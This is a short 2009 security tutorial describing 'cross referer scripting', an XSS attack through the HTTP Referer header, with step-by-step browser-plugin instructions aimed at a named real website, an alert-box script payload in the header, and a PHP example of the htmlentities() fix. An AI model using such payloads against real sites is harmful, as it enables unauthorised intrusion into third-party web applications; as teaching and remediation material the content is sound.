Introduction to XRS Cross Referer Scripting

9 February 2009

Another way to create XSS,
similar to XAS (exploiting a request header).

Let's discuss it here. Take this request:
http://www.cnil.fr/index.php?id=123
GET /index.php?id=123 HTTP/1.1
Host: www.cnil.fr
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9) Gecko/2008052906 Firefox/3.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive
Referer: http://www.google.com/search?q=http%3A%2F%2Fwww.cnil.fr%2Findex.php%3Fid%3D123&ie=utf-8&oe=utf-8&aq=t&rls=org.mozilla:en-US:official&client=firefox-a
Cookie: fe_typo_user=621d0722b0; TestCookieAlone=ok

The Referer header is used by many webmasters to track visitors.
That is why services exist that keep the webmaster from knowing which site you came from,
for example: http://anonym.to/en.html

We simply replace the Referer with 'malicious' code,
because many webmasters don't know about this vulnerability or forget it.

Download the Firefox plugin RefControl,
available here:
http://www.stardrifter.org/refcontrol/

Install it and restart Firefox.
Go to http://www.cnil.fr/index.php?id=123

In the Firefox menu: Tools > RefControl Options
Click [Add site]

Site: www.cnil.fr
Action: Custom (and type your favourite alert code)
Click the [OK] button

Then click the [OK] button again
Refresh your browser on the cnil.fr page

XRS…
http://www.cnil.fr/index.php?id=123
GET /index.php?id=123 HTTP/1.1
Host: www.cnil.fr
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9) Gecko/2008052906 Firefox/3.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive
Cookie: fe_typo_user=621d0722b0; TestCookieAlone=ok
Referer: '"></title><script>alert(1337)</script>><marquee><h1>XSS by Xylitol</h1></marquee>

To secure it, just use htmlentities() in the function that displays the referer.
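
One way to apply that fix, as an added example that is not part of the original post. The function names, the $server array and the 512-byte cap are assumptions made for illustration, and the sample header value is constructed from the modified request shown above.

```php
<?php
// Added example: a hypothetical "you came from" widget, not code from any real site.

// Before: the header is copied into the page as-is, so any markup in it
// is parsed by the visitor's browser.
function show_referer_unsafe(array $server): string
{
    $ref = $server['HTTP_REFERER'] ?? '';
    return '<p>You came from: ' . $ref . '</p>';
}

// After: encode at output time.
// ENT_QUOTES also encodes the single quote, which the pre-PHP 8.1 default
// (ENT_COMPAT) leaves untouched. ENT_SUBSTITUTE replaces invalid byte
// sequences instead of making htmlentities() return an empty string.
function h(string $value): string
{
    return htmlentities($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

function show_referer_safe(array $server): string
{
    $ref = $server['HTTP_REFERER'] ?? '';
    // A Referer header can be any length; cap what gets displayed (assumed limit).
    $ref = substr($ref, 0, 512);
    return '<p>You came from: ' . h($ref) . '</p>';
}

// Constructed sample input, shaped like the modified request above.
$server = ['HTTP_REFERER' => '\'"></title><script>alert(1337)</script>'];

echo show_referer_unsafe($server), "\n"; // markup reaches the page intact
echo show_referer_safe($server), "\n";   // same bytes, shown as inert text
```

htmlentities() covers HTML text and quoted attribute values; it is not sufficient when the value is written into a script block or an unquoted attribute.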

#Credits:
xssing, sla.ckers, 50-1337, xssed, security-sh3ll peoples
and all hardworking sceners in the scene
